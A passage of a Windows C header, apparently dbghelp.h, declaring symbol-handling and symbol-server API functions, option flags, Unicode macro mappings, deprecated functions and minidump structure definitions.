TI_GET_ARRAYINDEXTYPEID,
TI_FINDCHILDREN,
TI_GET_DATAKIND,
TI_GET_ADDRESSOFFSET,
TI_GET_OFFSET,
TI_GET_VALUE,
TI_GET_COUNT,
TI_GET_CHILDRENCOUNT,
TI_GET_BITPOSITION,
TI_GET_VIRTUALBASECLASS,
TI_GET_VIRTUALTABLESHAPEID,
TI_GET_VIRTUALBASEPOINTEROFFSET,
TI_GET_CLASSPARENTID,
TI_GET_NESTED,
TI_GET_SYMINDEX,
TI_GET_LEXICALPARENT,
TI_GET_ADDRESS,
TI_GET_THISADJUST,
TI_GET_UDTKIND,
TI_IS_EQUIV_TO,
TI_GET_CALLING_CONVENTION,
TI_IS_CLOSE_EQUIV_TO,
TI_GTIEX_REQS_VALID,
TI_GET_VIRTUALBASEOFFSET,
TI_GET_VIRTUALBASEDISPINDEX,
TI_GET_IS_REFERENCE,
TI_GET_INDIRECTVIRTUALBASECLASS,
IMAGEHLP_SYMBOL_TYPE_INFO_MAX,
} IMAGEHLP_SYMBOL_TYPE_INFO;
typedef struct _TI_FINDCHILDREN_PARAMS {
ULONG Count;
ULONG Start;
ULONG ChildId[1];
} TI_FINDCHILDREN_PARAMS;
BOOL
IMAGEAPI
SymGetTypeInfo(
__in HANDLE hProcess,
__in DWORD64 ModBase,
__in ULONG TypeId,
__in IMAGEHLP_SYMBOL_TYPE_INFO GetType,
__out PVOID pInfo
);
#define IMAGEHLP_GET_TYPE_INFO_UNCACHED 0x00000001
#define IMAGEHLP_GET_TYPE_INFO_CHILDREN 0x00000002
typedef struct _IMAGEHLP_GET_TYPE_INFO_PARAMS {
IN ULONG SizeOfStruct;
IN ULONG Flags;
IN ULONG NumIds;
IN PULONG TypeIds;
IN ULONG64 TagFilter;
IN ULONG NumReqs;
IN IMAGEHLP_SYMBOL_TYPE_INFO* ReqKinds;
IN PULONG_PTR ReqOffsets;
IN PULONG ReqSizes;
IN ULONG_PTR ReqStride;
IN ULONG_PTR BufferSize;
OUT PVOID Buffer;
OUT ULONG EntriesMatched;
OUT ULONG EntriesFilled;
OUT ULONG64 TagsFound;
OUT ULONG64 AllReqsValid;
IN ULONG NumReqsValid;
OUT PULONG64 ReqsValid OPTIONAL;
} IMAGEHLP_GET_TYPE_INFO_PARAMS, *PIMAGEHLP_GET_TYPE_INFO_PARAMS;
BOOL
IMAGEAPI
SymGetTypeInfoEx(
__in HANDLE hProcess,
__in DWORD64 ModBase,
__inout PIMAGEHLP_GET_TYPE_INFO_PARAMS Params
);
BOOL
IMAGEAPI
SymEnumTypes(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumTypesW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PSYM_ENUMERATESYMBOLS_CALLBACKW EnumSymbolsCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumTypesByName(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt PCSTR mask,
__in PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymEnumTypesByNameW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt PCWSTR mask,
__in PSYM_ENUMERATESYMBOLS_CALLBACKW EnumSymbolsCallback,
__in_opt PVOID UserContext
);
BOOL
IMAGEAPI
SymGetTypeFromName(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PCSTR Name,
__inout PSYMBOL_INFO Symbol
);
BOOL
IMAGEAPI
SymGetTypeFromNameW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PCWSTR Name,
__inout PSYMBOL_INFOW Symbol
);
BOOL
IMAGEAPI
SymAddSymbol(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PCSTR Name,
__in DWORD64 Address,
__in DWORD Size,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymAddSymbolW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PCWSTR Name,
__in DWORD64 Address,
__in DWORD Size,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymDeleteSymbol(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt PCSTR Name,
__in DWORD64 Address,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymDeleteSymbolW(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in_opt PCWSTR Name,
__in DWORD64 Address,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymRefreshModuleList(
__in HANDLE hProcess
);
BOOL
IMAGEAPI
SymAddSourceStream(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCSTR StreamFile,
__in_bcount_opt(Size) PBYTE Buffer,
__in size_t Size
);
typedef BOOL (WINAPI *SYMADDSOURCESTREAM)(HANDLE, ULONG64, PCSTR, PBYTE, size_t);
BOOL
IMAGEAPI
SymAddSourceStreamA(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCSTR StreamFile,
__in_bcount_opt(Size) PBYTE Buffer,
__in size_t Size
);
typedef BOOL (WINAPI *SYMADDSOURCESTREAMA)(HANDLE, ULONG64, PCSTR, PBYTE, size_t);
BOOL
IMAGEAPI
SymAddSourceStreamW(
__in HANDLE hProcess,
__in ULONG64 Base,
__in_opt PCWSTR FileSpec,
__in_bcount_opt(Size) PBYTE Buffer,
__in size_t Size
);
BOOL
IMAGEAPI
SymSrvIsStoreW(
__in_opt HANDLE hProcess,
__in PCWSTR path
);
BOOL
IMAGEAPI
SymSrvIsStore(
__in_opt HANDLE hProcess,
__in PCSTR path
);
PCSTR
IMAGEAPI
SymSrvDeltaName(
__in HANDLE hProcess,
__in_opt PCSTR SymPath,
__in PCSTR Type,
__in PCSTR File1,
__in PCSTR File2
);
PCWSTR
IMAGEAPI
SymSrvDeltaNameW(
__in HANDLE hProcess,
__in_opt PCWSTR SymPath,
__in PCWSTR Type,
__in PCWSTR File1,
__in PCWSTR File2
);
PCSTR
IMAGEAPI
SymSrvGetSupplement(
__in HANDLE hProcess,
__in_opt PCSTR SymPath,
__in PCSTR Node,
__in PCSTR File
);
PCWSTR
IMAGEAPI
SymSrvGetSupplementW(
__in HANDLE hProcess,
__in_opt PCWSTR SymPath,
__in PCWSTR Node,
__in PCWSTR File
);
BOOL
IMAGEAPI
SymSrvGetFileIndexes(
__in PCSTR File,
__out GUID *Id,
__out PDWORD Val1,
__out_opt PDWORD Val2,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymSrvGetFileIndexesW(
__in PCWSTR File,
__out GUID *Id,
__out PDWORD Val1,
__out_opt PDWORD Val2,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymSrvGetFileIndexStringW(
__in HANDLE hProcess,
__in_opt PCWSTR SrvPath,
__in PCWSTR File,
__out_ecount(Size) PWSTR Index,
__in size_t Size,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymSrvGetFileIndexString(
__in HANDLE hProcess,
__in_opt PCSTR SrvPath,
__in PCSTR File,
__out_ecount(Size) PSTR Index,
__in size_t Size,
__in DWORD Flags
);
typedef struct {
DWORD sizeofstruct;
char file[MAX_PATH +1];
BOOL stripped;
DWORD timestamp;
DWORD size;
char dbgfile[MAX_PATH +1];
char pdbfile[MAX_PATH + 1];
GUID guid;
DWORD sig;
DWORD age;
} SYMSRV_INDEX_INFO, *PSYMSRV_INDEX_INFO;
typedef struct {
DWORD sizeofstruct;
WCHAR file[MAX_PATH +1];
BOOL stripped;
DWORD timestamp;
DWORD size;
WCHAR dbgfile[MAX_PATH +1];
WCHAR pdbfile[MAX_PATH + 1];
GUID guid;
DWORD sig;
DWORD age;
} SYMSRV_INDEX_INFOW, *PSYMSRV_INDEX_INFOW;
BOOL
IMAGEAPI
SymSrvGetFileIndexInfo(
__in PCSTR File,
__out PSYMSRV_INDEX_INFO Info,
__in DWORD Flags
);
BOOL
IMAGEAPI
SymSrvGetFileIndexInfoW(
__in PCWSTR File,
__out PSYMSRV_INDEX_INFOW Info,
__in DWORD Flags
);
PCSTR
IMAGEAPI
SymSrvStoreSupplement(
__in HANDLE hProcess,
__in_opt PCSTR SrvPath,
__in PCSTR Node,
__in PCSTR File,
__in DWORD Flags
);
PCWSTR
IMAGEAPI
SymSrvStoreSupplementW(
__in HANDLE hProcess,
__in_opt PCWSTR SymPath,
__in PCWSTR Node,
__in PCWSTR File,
__in DWORD Flags
);
PCSTR
IMAGEAPI
SymSrvStoreFile(
__in HANDLE hProcess,
__in_opt PCSTR SrvPath,
__in PCSTR File,
__in DWORD Flags
);
PCWSTR
IMAGEAPI
SymSrvStoreFileW(
__in HANDLE hProcess,
__in_opt PCWSTR SrvPath,
__in PCWSTR File,
__in DWORD Flags
);
// used by SymGetSymbolFile's "Type" parameter
typedef enum {
sfImage = 0,
sfDbg,
sfPdb,
sfMpd,
sfMax
} DBG_SF_ENUM;
BOOL
IMAGEAPI
SymGetSymbolFile(
__in_opt HANDLE hProcess,
__in_opt PCSTR SymPath,
__in PCSTR ImageFile,
__in DWORD Type,
__out_ecount(cSymbolFile) PSTR SymbolFile,
__in size_t cSymbolFile,
__out_ecount(cDbgFile) PSTR DbgFile,
__in size_t cDbgFile
);
BOOL
IMAGEAPI
SymGetSymbolFileW(
__in_opt HANDLE hProcess,
__in_opt PCWSTR SymPath,
__in PCWSTR ImageFile,
__in DWORD Type,
__out_ecount(cSymbolFile) PWSTR SymbolFile,
__in size_t cSymbolFile,
__out_ecount(cDbgFile) PWSTR DbgFile,
__in size_t cDbgFile
);
//
// Full user-mode dump creation.
//
typedef BOOL (WINAPI *PDBGHELP_CREATE_USER_DUMP_CALLBACK)(
__in DWORD DataType,
__in PVOID* Data,
__out LPDWORD DataLength,
__in_opt PVOID UserData
);
BOOL
WINAPI
DbgHelpCreateUserDump(
__in_opt LPCSTR FileName,
__in PDBGHELP_CREATE_USER_DUMP_CALLBACK Callback,
__in_opt PVOID UserData
);
BOOL
WINAPI
DbgHelpCreateUserDumpW(
__in_opt LPCWSTR FileName,
__in PDBGHELP_CREATE_USER_DUMP_CALLBACK Callback,
__in_opt PVOID UserData
);
// -----------------------------------------------------------------
// The following 4 legacy APIs are fully supported, but newer
// ones are recommended. SymFromName and SymFromAddr provide
// much more detailed info on the returned symbol.
BOOL
IMAGEAPI
SymGetSymFromAddr64(
__in HANDLE hProcess,
__in DWORD64 qwAddr,
__out_opt PDWORD64 pdwDisplacement,
__inout PIMAGEHLP_SYMBOL64 Symbol
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetSymFromAddr SymGetSymFromAddr64
#else
BOOL
IMAGEAPI
SymGetSymFromAddr(
__in HANDLE hProcess,
__in DWORD dwAddr,
__out_opt PDWORD pdwDisplacement,
__inout PIMAGEHLP_SYMBOL Symbol
);
#endif
// While following two APIs will provide a symbol from a name,
// SymEnumSymbols can provide the same matching information
// for ALL symbols with a matching name, even regular
// expressions. That way you can search across modules
// and differentiate between identically named symbols.
BOOL
IMAGEAPI
SymGetSymFromName64(
__in HANDLE hProcess,
__in PCSTR Name,
__inout PIMAGEHLP_SYMBOL64 Symbol
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetSymFromName SymGetSymFromName64
#else
BOOL
IMAGEAPI
SymGetSymFromName(
__in HANDLE hProcess,
__in PCSTR Name,
__inout PIMAGEHLP_SYMBOL Symbol
);
#endif
// Symbol server exports
typedef BOOL (WINAPI *PSYMBOLSERVERPROC)(PCSTR, PCSTR, PVOID, DWORD, DWORD, PSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERPROCA)(PCSTR, PCSTR, PVOID, DWORD, DWORD, PSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERPROCW)(PCWSTR, PCWSTR, PVOID, DWORD, DWORD, PWSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERBYINDEXPROC)(PCSTR, PCSTR, PCSTR, PSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERBYINDEXPROCA)(PCSTR, PCSTR, PCSTR, PSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERBYINDEXPROCW)(PCWSTR, PCWSTR, PCWSTR, PWSTR);
typedef BOOL (WINAPI *PSYMBOLSERVEROPENPROC)(VOID);
typedef BOOL (WINAPI *PSYMBOLSERVERCLOSEPROC)(VOID);
typedef BOOL (WINAPI *PSYMBOLSERVERSETOPTIONSPROC)(UINT_PTR, ULONG64);
typedef BOOL (WINAPI *PSYMBOLSERVERSETOPTIONSWPROC)(UINT_PTR, ULONG64);
typedef BOOL (CALLBACK WINAPI *PSYMBOLSERVERCALLBACKPROC)(UINT_PTR action, ULONG64 data, ULONG64 context);
typedef UINT_PTR (WINAPI *PSYMBOLSERVERGETOPTIONSPROC)();
typedef BOOL (WINAPI *PSYMBOLSERVERPINGPROC)(PCSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERPINGPROCA)(PCSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERPINGPROCW)(PCWSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERGETVERSION)(LPAPI_VERSION);
typedef BOOL (WINAPI *PSYMBOLSERVERDELTANAME)(PCSTR, PVOID, DWORD, DWORD, PVOID, DWORD, DWORD, PSTR, size_t);
typedef BOOL (WINAPI *PSYMBOLSERVERDELTANAMEW)(PCWSTR, PVOID, DWORD, DWORD, PVOID, DWORD, DWORD, PWSTR, size_t);
typedef BOOL (WINAPI *PSYMBOLSERVERGETSUPPLEMENT)(PCSTR, PCSTR, PCSTR, PSTR, size_t);
typedef BOOL (WINAPI *PSYMBOLSERVERGETSUPPLEMENTW)(PCWSTR, PCWSTR, PCWSTR, PWSTR, size_t);
typedef BOOL (WINAPI *PSYMBOLSERVERSTORESUPPLEMENT)(PCSTR, PCSTR, PCSTR, PSTR, size_t, DWORD);
typedef BOOL (WINAPI *PSYMBOLSERVERSTORESUPPLEMENTW)(PCWSTR, PCWSTR, PCWSTR, PWSTR, size_t, DWORD);
typedef BOOL (WINAPI *PSYMBOLSERVERGETINDEXSTRING)(PVOID, DWORD, DWORD, PSTR, size_t);
typedef BOOL (WINAPI *PSYMBOLSERVERGETINDEXSTRINGW)(PVOID, DWORD, DWORD, PWSTR, size_t);
typedef BOOL (WINAPI *PSYMBOLSERVERSTOREFILE)(PCSTR, PCSTR, PVOID, DWORD, DWORD, PSTR, size_t, DWORD);
typedef BOOL (WINAPI *PSYMBOLSERVERSTOREFILEW)(PCWSTR, PCWSTR, PVOID, DWORD, DWORD, PWSTR, size_t, DWORD);
typedef BOOL (WINAPI *PSYMBOLSERVERISSTORE)(PCSTR);
typedef BOOL (WINAPI *PSYMBOLSERVERISSTOREW)(PCWSTR);
typedef DWORD (WINAPI *PSYMBOLSERVERVERSION)();
typedef BOOL (CALLBACK WINAPI *PSYMBOLSERVERMESSAGEPROC)(UINT_PTR action, ULONG64 data, ULONG64 context);
#define SYMSRV_VERSION 2
#define SSRVOPT_CALLBACK 0x00000001
#define SSRVOPT_DWORD 0x00000002
#define SSRVOPT_DWORDPTR 0x00000004
#define SSRVOPT_GUIDPTR 0x00000008
#define SSRVOPT_OLDGUIDPTR 0x00000010
#define SSRVOPT_UNATTENDED 0x00000020
#define SSRVOPT_NOCOPY 0x00000040
#define SSRVOPT_GETPATH 0x00000040
#define SSRVOPT_PARENTWIN 0x00000080
#define SSRVOPT_PARAMTYPE 0x00000100
#define SSRVOPT_SECURE 0x00000200
#define SSRVOPT_TRACE 0x00000400
#define SSRVOPT_SETCONTEXT 0x00000800
#define SSRVOPT_PROXY 0x00001000
#define SSRVOPT_DOWNSTREAM_STORE 0x00002000
#define SSRVOPT_OVERWRITE 0x00004000
#define SSRVOPT_RESETTOU 0x00008000
#define SSRVOPT_CALLBACKW 0x00010000
#define SSRVOPT_FLAT_DEFAULT_STORE 0x00020000
#define SSRVOPT_PROXYW 0x00040000
#define SSRVOPT_MESSAGE 0x00080000
#define SSRVOPT_SERVICE 0x00100000 // deprecated
#define SSRVOPT_FAVOR_COMPRESSED 0x00200000
#define SSRVOPT_STRING 0x00400000
#define SSRVOPT_WINHTTP 0x00800000
#define SSRVOPT_WININET 0x01000000
#define SSRVOPT_MAX 0x0100000
#define SSRVOPT_RESET ((ULONG_PTR)-1)
#define NUM_SSRVOPTS 30
#define SSRVACTION_TRACE 1
#define SSRVACTION_QUERYCANCEL 2
#define SSRVACTION_EVENT 3
#define SSRVACTION_EVENTW 4
#define SSRVACTION_SIZE 5
#define SYMSTOREOPT_COMPRESS 0x01
#define SYMSTOREOPT_OVERWRITE 0x02
#define SYMSTOREOPT_RETURNINDEX 0x04
#define SYMSTOREOPT_POINTER 0x08
#define SYMSTOREOPT_ALT_INDEX 0x10
#define SYMSTOREOPT_UNICODE 0x20
#define SYMSTOREOPT_PASS_IF_EXISTS 0x40
#ifdef DBGHELP_TRANSLATE_TCHAR
#define SymInitialize SymInitializeW
#define SymAddSymbol SymAddSymbolW
#define SymDeleteSymbol SymDeleteSymbolW
#define SearchTreeForFile SearchTreeForFileW
#define UnDecorateSymbolName UnDecorateSymbolNameW
#define SymGetLineFromName64 SymGetLineFromNameW64
#define SymGetLineFromAddr64 SymGetLineFromAddrW64
#define SymGetLineNext64 SymGetLineNextW64
#define SymGetLinePrev64 SymGetLinePrevW64
#define SymFromName SymFromNameW
#define SymFindExecutableImage SymFindExecutableImageW
#define FindExecutableImageEx FindExecutableImageExW
#define SymSearch SymSearchW
#define SymEnumLines SymEnumLinesW
#define SymEnumSourceLines SymEnumSourceLinesW
#define SymGetTypeFromName SymGetTypeFromNameW
#define SymEnumSymbolsForAddr SymEnumSymbolsForAddrW
#define SymFromAddr SymFromAddrW
#define SymMatchString SymMatchStringW
#define SymEnumSourceFiles SymEnumSourceFilesW
#define SymEnumSymbols SymEnumSymbolsW
#define SymLoadModuleEx SymLoadModuleExW
#define SymSetSearchPath SymSetSearchPathW
#define SymGetSearchPath SymGetSearchPathW
#define EnumDirTree EnumDirTreeW
#define SymFromToken SymFromTokenW
#define SymFromIndex SymFromIndexW
#define SymGetScope SymGetScopeW
#define SymNext SymNextW
#define SymPrev SymPrevW
#define SymEnumTypes SymEnumTypesW
#define SymEnumTypesByName SymEnumTypesByNameW
#define SymRegisterCallback64 SymRegisterCallbackW64
#define SymFindDebugInfoFile SymFindDebugInfoFileW
#define FindDebugInfoFileEx FindDebugInfoFileExW
#define SymFindFileInPath SymFindFileInPathW
#define SymEnumerateModules64 SymEnumerateModulesW64
#define SymSetHomeDirectory SymSetHomeDirectoryW
#define SymGetHomeDirectory SymGetHomeDirectoryW
#define SymGetSourceFile SymGetSourceFileW
#define SymGetSourceFileToken SymGetSourceFileTokenW
#define SymGetSourceFileFromToken SymGetSourceFileFromTokenW
#define SymGetSourceVarFromToken SymGetSourceVarFromTokenW
#define SymGetSourceFileToken SymGetSourceFileTokenW
#define SymGetFileLineOffsets64 SymGetFileLineOffsetsW64
#define SymFindFileInPath SymFindFileInPathW
#define SymMatchFileName SymMatchFileNameW
#define SymGetSourceFileFromToken SymGetSourceFileFromTokenW
#define SymGetSourceVarFromToken SymGetSourceVarFromTokenW
#define SymGetModuleInfo64 SymGetModuleInfoW64
#define SymSrvIsStore SymSrvIsStoreW
#define SymSrvDeltaName SymSrvDeltaNameW
#define SymSrvGetSupplement SymSrvGetSupplementW
#define SymSrvStoreSupplement SymSrvStoreSupplementW
#define SymSrvGetFileIndexes SymSrvGetFileIndexes
#define SymSrvGetFileIndexString SymSrvGetFileIndexStringW
#define SymSrvStoreFile SymSrvStoreFileW
#define SymGetSymbolFile SymGetSymbolFileW
#define EnumerateLoadedModules64 EnumerateLoadedModulesW64
#define EnumerateLoadedModulesEx EnumerateLoadedModulesExW
#define SymSrvGetFileIndexInfo SymSrvGetFileIndexInfoW
#define IMAGEHLP_LINE64 IMAGEHLP_LINEW64
#define PIMAGEHLP_LINE64 PIMAGEHLP_LINEW64
#define SYMBOL_INFO SYMBOL_INFOW
#define PSYMBOL_INFO PSYMBOL_INFOW
#define SYMBOL_INFO_PACKAGE SYMBOL_INFO_PACKAGEW
#define PSYMBOL_INFO_PACKAGE PSYMBOL_INFO_PACKAGEW
#define FIND_EXE_FILE_CALLBACK FIND_EXE_FILE_CALLBACKW
#define PFIND_EXE_FILE_CALLBACK PFIND_EXE_FILE_CALLBACKW
#define SYM_ENUMERATESYMBOLS_CALLBACK SYM_ENUMERATESYMBOLS_CALLBACKW
#define PSYM_ENUMERATESYMBOLS_CALLBACK PSYM_ENUMERATESYMBOLS_CALLBACKW
#define SRCCODEINFO SRCCODEINFOW
#define PSRCCODEINFO PSRCCODEINFOW
#define SOURCEFILE SOURCEFILEW
#define PSOURCEFILE PSOURCEFILEW
#define SYM_ENUMSOURECFILES_CALLBACK SYM_ENUMSOURCEFILES_CALLBACKW
#define PSYM_ENUMSOURCEFILES_CALLBACK PSYM_ENUMSOURECFILES_CALLBACKW
#define IMAGEHLP_CBA_EVENT IMAGEHLP_CBA_EVENTW
#define PIMAGEHLP_CBA_EVENT PIMAGEHLP_CBA_EVENTW
#define PENUMDIRTREE_CALLBACK PENUMDIRTREE_CALLBACKW
#define IMAGEHLP_DEFERRED_SYMBOL_LOAD64 IMAGEHLP_DEFERRED_SYMBOL_LOADW64
#define PIMAGEHLP_DEFERRED_SYMBOL_LOAD64 PIMAGEHLP_DEFERRED_SYMBOL_LOADW64
#define PFIND_DEBUG_FILE_CALLBACK PFIND_DEBUG_FILE_CALLBACKW
#define PFINDFILEINPATHCALLBACK PFINDFILEINPATHCALLBACKW
#define IMAGEHLP_MODULE64 IMAGEHLP_MODULEW64
#define PIMAGEHLP_MODULE64 PIMAGEHLP_MODULEW64
#define SYMSRV_INDEX_INFO SYMSRV_INDEX_INFOW
#define PSYMSRV_INDEX_INFO PSYMSRV_INDEX_INFOW
#define PSYMBOLSERVERPROC PSYMBOLSERVERPROCW
#define PSYMBOLSERVERPINGPROC PSYMBOLSERVERPINGPROCW
#endif
// -----------------------------------------------------------------
// The following APIs exist only for backwards compatibility
// with a pre-release version documented in an MSDN release.
// You should use SymFindFileInPath if you want to maintain
// future compatibility.
DBHLP_DEPRECIATED
BOOL
IMAGEAPI
FindFileInPath(
__in HANDLE hprocess,
__in PCSTR SearchPath,
__in PCSTR FileName,
__in PVOID id,
__in DWORD two,
__in DWORD three,
__in DWORD flags,
__out_ecount(MAX_PATH + 1) PSTR FilePath
);
// You should use SymFindFileInPath if you want to maintain
// future compatibility.
DBHLP_DEPRECIATED
BOOL
IMAGEAPI
FindFileInSearchPath(
__in HANDLE hprocess,
__in PCSTR SearchPath,
__in PCSTR FileName,
__in DWORD one,
__in DWORD two,
__in DWORD three,
__out_ecount(MAX_PATH + 1) PSTR FilePath
);
DBHLP_DEPRECIATED
BOOL
IMAGEAPI
SymEnumSym(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PSYM_ENUMERATESYMBOLS_CALLBACK EnumSymbolsCallback,
__in_opt PVOID UserContext
);
DBHLP_DEPRECIATED
BOOL
IMAGEAPI
SymEnumerateSymbols64(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PSYM_ENUMSYMBOLS_CALLBACK64 EnumSymbolsCallback,
__in_opt PVOID UserContext
);
DBHLP_DEPRECIATED
BOOL
IMAGEAPI
SymEnumerateSymbolsW64(
__in HANDLE hProcess,
__in ULONG64 BaseOfDll,
__in PSYM_ENUMSYMBOLS_CALLBACK64W EnumSymbolsCallback,
__in_opt PVOID UserContext
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymEnumerateSymbols SymEnumerateSymbols64
#define SymEnumerateSymbolsW SymEnumerateSymbolsW64
#else
DBHLP_DEPRECIATED
BOOL
IMAGEAPI
SymEnumerateSymbols(
__in HANDLE hProcess,
__in ULONG BaseOfDll,
__in PSYM_ENUMSYMBOLS_CALLBACK EnumSymbolsCallback,
__in_opt PVOID UserContext
);
DBHLP_DEPRECIATED
BOOL
IMAGEAPI
SymEnumerateSymbolsW(
__in HANDLE hProcess,
__in ULONG BaseOfDll,
__in PSYM_ENUMSYMBOLS_CALLBACKW EnumSymbolsCallback,
__in_opt PVOID UserContext
);
#endif
// use SymLoadModuleEx
DWORD64
IMAGEAPI
SymLoadModule64(
__in HANDLE hProcess,
__in_opt HANDLE hFile,
__in_opt PCSTR ImageName,
__in_opt PCSTR ModuleName,
__in DWORD64 BaseOfDll,
__in DWORD SizeOfDll
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymLoadModule SymLoadModule64
#else
DWORD
IMAGEAPI
SymLoadModule(
__in HANDLE hProcess,
__in_opt HANDLE hFile,
__in_opt PCSTR ImageName,
__in_opt PCSTR ModuleName,
__in DWORD BaseOfDll,
__in DWORD SizeOfDll
);
#endif
BOOL
IMAGEAPI
SymGetSymNext64(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOL64 Symbol
);
BOOL
IMAGEAPI
SymGetSymNextW64(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOLW64 Symbol
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetSymNext SymGetSymNext64
#define SymGetSymNextW SymGetSymNextW64
#else
BOOL
IMAGEAPI
SymGetSymNext(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOL Symbol
);
BOOL
IMAGEAPI
SymGetSymNextW(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOLW Symbol
);
#endif
BOOL
IMAGEAPI
SymGetSymPrev64(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOL64 Symbol
);
BOOL
IMAGEAPI
SymGetSymPrevW64(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOLW64 Symbol
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define SymGetSymPrev SymGetSymPrev64
#define SymGetSymPrevW SymGetSymPrevW64
#else
BOOL
IMAGEAPI
SymGetSymPrev(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOL Symbol
);
BOOL
IMAGEAPI
SymGetSymPrevW(
__in HANDLE hProcess,
__inout PIMAGEHLP_SYMBOLW Symbol
);
#endif
// These values should not be used.
// They have been replaced by SYMFLAG_ values.
#define SYMF_OMAP_GENERATED 0x00000001
#define SYMF_OMAP_MODIFIED 0x00000002
#define SYMF_REGISTER 0x00000008
#define SYMF_REGREL 0x00000010
#define SYMF_FRAMEREL 0x00000020
#define SYMF_PARAMETER 0x00000040
#define SYMF_LOCAL 0x00000080
#define SYMF_CONSTANT 0x00000100
#define SYMF_EXPORT 0x00000200
#define SYMF_FORWARDER 0x00000400
#define SYMF_FUNCTION 0x00000800
#define SYMF_VIRTUAL 0x00001000
#define SYMF_THUNK 0x00002000
#define SYMF_TLSREL 0x00004000
// These values should also not be used.
// They have been replaced by SYMFLAG_ values.
#define IMAGEHLP_SYMBOL_INFO_VALUEPRESENT 1
#define IMAGEHLP_SYMBOL_INFO_REGISTER SYMF_REGISTER // 0x0008
#define IMAGEHLP_SYMBOL_INFO_REGRELATIVE SYMF_REGREL // 0x0010
#define IMAGEHLP_SYMBOL_INFO_FRAMERELATIVE SYMF_FRAMEREL // 0x0020
#define IMAGEHLP_SYMBOL_INFO_PARAMETER SYMF_PARAMETER // 0x0040
#define IMAGEHLP_SYMBOL_INFO_LOCAL SYMF_LOCAL // 0x0080
#define IMAGEHLP_SYMBOL_INFO_CONSTANT SYMF_CONSTANT // 0x0100
#define IMAGEHLP_SYMBOL_FUNCTION SYMF_FUNCTION // 0x0800
#define IMAGEHLP_SYMBOL_VIRTUAL SYMF_VIRTUAL // 0x1000
#define IMAGEHLP_SYMBOL_THUNK SYMF_THUNK // 0x2000
#define IMAGEHLP_SYMBOL_INFO_TLSRELATIVE SYMF_TLSREL // 0x4000
#include <poppack.h>
#include <pshpack4.h>
#if defined(_MSC_VER)
#if _MSC_VER >= 800
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning(disable:4200) /* Zero length array */
#pragma warning(disable:4201) /* Nameless struct/union */
#endif
#endif
#define MINIDUMP_SIGNATURE ('PMDM')
#define MINIDUMP_VERSION (42899)
typedef DWORD RVA;
typedef ULONG64 RVA64;
typedef struct _MINIDUMP_LOCATION_DESCRIPTOR {
ULONG32 DataSize;
RVA Rva;
} MINIDUMP_LOCATION_DESCRIPTOR;
typedef struct _MINIDUMP_LOCATION_DESCRIPTOR64 {
ULONG64 DataSize;
RVA64 Rva;
} MINIDUMP_LOCATION_DESCRIPTOR64;
typedef struct _MINIDUMP_MEMORY_DESCRIPTOR {
ULONG64 StartOfMemoryRange;
MINIDUMP_LOCATION_DESCRIPTOR Memory;
} MINIDUMP_MEMORY_DESCRIPTOR, *PMINIDUMP_MEMORY_DESCRIPTOR;
// DESCRIPTOR64 is used for full-memory minidumps where
// all of the raw memory is laid out sequentially at the
// end of the dump. There is no need for individual RVAs
// as the RVA is the base RVA plus the sum of the preceeding
// data blocks.
typedef struct _MINIDUMP_MEMORY_DESCRIPTOR64 {
ULONG64 StartOfMemoryRange;
ULONG64 DataSize;
} MINIDUMP_MEMORY_DESCRIPTOR64, *PMINIDUMP_MEMORY_DESCRIPTOR64;
typedef struct _MINIDUMP_HEADER {
ULONG32 Signature;
ULONG32 Version;
ULONG32 NumberOfStreams;
RVA StreamDirectoryRva;
ULONG32 CheckSum;
union {
ULONG32 Reserved;
ULONG32 TimeDateStamp;
};
ULONG64 Flags;
} MINIDUMP_HEADER, *PMINIDUMP_HEADER;
